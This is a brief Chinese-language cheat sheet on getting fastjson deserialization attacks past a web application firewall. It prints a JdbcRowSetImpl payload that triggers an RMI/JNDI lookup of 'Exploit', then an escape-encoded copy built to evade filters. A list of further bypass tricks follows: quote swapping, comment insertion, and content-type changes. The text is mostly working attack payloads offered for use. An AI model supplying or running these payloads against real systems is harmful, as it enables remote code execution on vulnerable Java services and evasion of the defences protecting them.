fastjson绕过waf

1.原请求

{“@type”:”com.sun.rowset.JdbcRowSetImpl”,”dataSourceName”:”rmi://localhost:1099/Exploit”,”autoCommit”:true}

2.多编码绕过

{“\u0040\u0074\u0079\u0070\u0065″:”\x63\x6f\x6d\x2e\x73\x75\x6e\x2e\x72\x6f\x77\x73\x65\x74\x2e\x4a\x64\x62\x63\x52\x6f\x77\x53\x65\x74\x49\x6d\x70\x6c”,”\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065″:”rmi://localhost:1099/Exploit”,”\x61\x75\x74\x6f\x43\x6f\x6d\x6d\x69\x74″:true}

2.单引号替换双引号

3. ,替换空格

4.注释绕过/**/

5.使用-绕过

6.使用_绕过

7.修改content-type */*

8.多重配合绕过